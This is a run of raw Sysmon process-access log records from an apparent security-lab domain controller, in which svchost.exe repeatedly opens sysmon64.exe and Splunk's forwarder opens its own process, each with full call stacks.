13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.868{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.853{08A6967A-4299-6000-4600-000000009A01}40444048C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.839{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 